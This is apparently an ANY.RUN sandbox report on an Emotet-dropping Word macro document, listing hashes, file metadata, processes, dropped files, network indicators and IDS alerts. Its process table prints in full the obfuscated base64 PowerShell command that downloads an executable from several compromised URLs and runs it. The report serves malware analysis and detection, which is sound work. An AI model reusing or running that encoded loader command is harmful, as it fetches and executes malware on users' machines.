analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ba10319f5b905bc7b26bbf05ff764674e55ab6122773c20d797f38aeab63e977

Full analysis: https://app.any.run/tasks/184b6460-9e93-48c7-87b3-58b6177ae2f3
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: May 15, 2019, 15:33:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: auxiliary, Subject: Bermuda, Author: Derrick Moore, Comments: Health, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May 15 08:34:00 2019, Last Saved Time/Date: Wed May 15 08:34:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0
MD5:

1D6A25784C27CD53B09EDE8DA3293759

SHA1:

F4DD0E4E1965D75CF8B4AA08F076A41EF3DF2FBD

SHA256:

BA10319F5B905BC7B26BBF05FF764674E55AB6122773C20D797F38AEAB63E977

SSDEEP:

3072:a77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q0PNg4LQRnfDXc+:a77HUUUUUUUUUUUUUUUUUUUT52VZDLQX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 299.exe (PID: 3608)
      • 299.exe (PID: 2816)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2832)

  • SUSPICIOUS

    • Application launched itself

      • 299.exe (PID: 3608)

    • Creates files in the user directory

      • powershell.exe (PID: 2832)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2832)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2948)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2948)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Manager: Satterfield
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 201
Paragraphs: 1
Lines: 1
Company: Jaskolski, O'Hara and Kihn
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 172
Words: 30
Pages: 1
ModifyDate: 2019:05:15 07:34:00
CreateDate: 2019:05:15 07:34:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Health
Keywords: -
Author: Derrick Moore
Subject: Bermuda
Title: auxiliary
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
4
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe 299.exe no specs 299.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2948"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ba10319f5b905bc7b26bbf05ff764674e55ab6122773c20d797f38aeab63e977.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2832powershell -enc JAB3ADgANQA1ADIAMgBfADkAPQAnAGwAOQBfADUAOQAxADcAMAAnADsAJABBADAAOQA2ADkAOQAgAD0AIAAnADIAOQA5ACcAOwAkAEsANgA0ADgAOAAxADkAMAA9ACcAbwAxAF8AOAAyADcANwAnADsAJAB6ADMAMwA1AF8AOQBfADAAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAMAA5ADYAOQA5ACsAJwAuAGUAeABlACcAOwAkAFYAMwA1ADEAMgA3AD0AJwBGADkAXwAwADYAMgAyACcAOwAkAE0ANAA3ADgAMQA3AF8ANwA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AGUAYABCAGAAYwBMAEkARQBOAFQAOwAkAEQANwAxADUAMwBfADAAPQAnAGgAdAB0AHAAOgAvAC8AZAByAG0AYQByAGkAbgBzAC4AYwBvAG0ALwBlAG4AZwBsAC8AcABDAEEAZABPAEwAVwBMAEoALwBAAGgAdAB0AHAAOgAvAC8AaAB5AGIAcgBpAGQAYgB1AHMAaQBuAGUAcwBzAHMAbwBsAHUAdABpAG8AbgBzAC4AYwBvAG0ALgBhAHUALwBjAGcAaQAtAGIAaQBuAC8AdAA2AHkAZQAwAGoAXwB3AHkAaABmADQAeQB3AC0AMgAvAEAAaAB0AHQAcAA6AC8ALwBkAHUAcgBhAGsAYgB1AGYAZQBjAGUAbgBnAGUAbABrAG8AeQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ARwByAEkAQgBRAFQAbgBvAE8ALwBAAGgAdAB0AHAAOgAvAC8AcABlAHIAZgBvAHIAbQBhAG4AYwBlAHYAaQB0AGEAbABpAHQAeQAuAG4AZQB0AC8AcABhAHIAdABuAGUAcgAvAHIAcQAyAHQAbwB0AHYAXwBiAHIAeQBoAGQAcQBqAGMAMgAtADEANwAzADIAMAAvAEAAaAB0AHQAcAA6AC8ALwB0AG4AcgBrAGUAbgB0AG8AbgBvAGQAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgB4AGEAbABqAG4AZQBxAF8AZgA5AHYAYwB3AHYAcwB6ADAAMwAtADAAMQA1ADgANAA1ADUAMQA5AC8AJwAuAFMAUABMAEkAdAAoACcAQAAnACkAOwAkAEUAOQA2ADIAMgAwAD0AJwB6ADgAMQA5ADcANgAnADsAZgBvAHIAZQBhAGMAaAAoACQAawA0ADUANwAwADgANwAgAGkAbgAgACQARAA3ADEANQAzAF8AMAApAHsAdAByAHkAewAkAE0ANAA3ADgAMQA3AF8ANwAuAGQATwBXAG4ATABvAEEARABmAEkATABFACgAJABrADQANQA3ADAAOAA3ACwAIAAkAHoAMwAzADUAXwA5AF8AMAApADsAJABIADMANgAwADUAMwAyADUAPQAnAEYAMAA4ADQAXwAwADAAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJAB6ADMAMwA1AF8AOQBfADAAKQAuAGwAZQBuAEcAVABIACAALQBnAGUAIAAzADkAOAA4ADgAKQAgAHsALgAoACcASQAnACsAJwBuAHYAbwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAgACQAegAzADMANQBfADkAXwAwADsAJABmADEAMwA0ADgAOQAzADAAPQAnAFoANABfADEANAAwADcAXwAnADsAYgByAGUAYQBrADsAJABmADEAOAA2ADkAOQA3ADgAPQAnAHIANwBfADIAMwAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAOABfADQAMwA2AD0AJwB2ADcAXwAxADMAXwA0ADcAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3608"C:\Users\admin\299.exe" C:\Users\admin\299.exepowershell.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Process Manager Remote Server
Exit code:
0
Version:
1.8.0.1800
2816--809e8ef0C:\Users\admin\299.exe299.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Process Manager Remote Server
Version:
1.8.0.1800
Total events
1 323
Read events
1 145
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE984.tmp.cvr
MD5:
SHA256:
2832powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q3H1O6JRG9FWRD14H0GP.temp
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14886899.wmfwmf
MD5:7907BCF3F284D08A4DA157F3F4902C99
SHA256:6129156B299323A9F65C20E6EBAD8F061E42DA27E7C581EE61AD63FA1F041B02
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A425213.wmfwmf
MD5:9178EBDA8B7DE70BD2B2A2920B8432F5
SHA256:8A9C3B0675C738C5806B2ECC184D6BC468B97BB6664FCE77FE3661E3BCE22337
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:59EF39F4B5EEC9FDB637A893045AED0C
SHA256:7DF4D0C548BE0C7AF2E10EB700E482B1916C476B9CD5E9D04236878B1F900507
2948WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:2F9C7C605939A1130568CFB9CA2D05DF
SHA256:E06B27556C70F4C3F490DE60D6DEEDC378FD1A1AFBA718D28C81828769E51573
2832powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF14f376.TMPbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$10319f5b905bc7b26bbf05ff764674e55ab6122773c20d797f38aeab63e977.docpgc
MD5:20F0656ABB968AE0D667F4A784B571B2
SHA256:EA087BC504E1AA67BE77E755B82D72874D8FFDEB981CE539C3A4D04574AF0880
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F911AF5.wmfwmf
MD5:2BCEB021B7E6D5E250903AC49F782751
SHA256:CAC2F946EE60C4AF01C047B9FAF7228034A55465DA63DB5DAEB659F7EF46E06D
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C96D9DC4.wmfwmf
MD5:282181D2EF2FE4CA1C312725CADE1872
SHA256:1C2D960403998B0F8BB4521309FBA9F8AE8861F380CFCE549FA378ADA6BFB967
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2832
powershell.exe
GET
200
13.76.250.225:80
http://drmarins.com/engl/pCAdOLWLJ/
SG
executable
172 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2832
powershell.exe
13.76.250.225:80
drmarins.com
Microsoft Corporation
SG
suspicious

DNS requests

Domain
IP
Reputation
drmarins.com
  • 13.76.250.225
malicious

Threats

PID
Process
Class
Message
2832
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2832
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2832
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
ba10319f5b905bc7b26bbf05ff764674e55ab6122773c20d797f38aeab63e977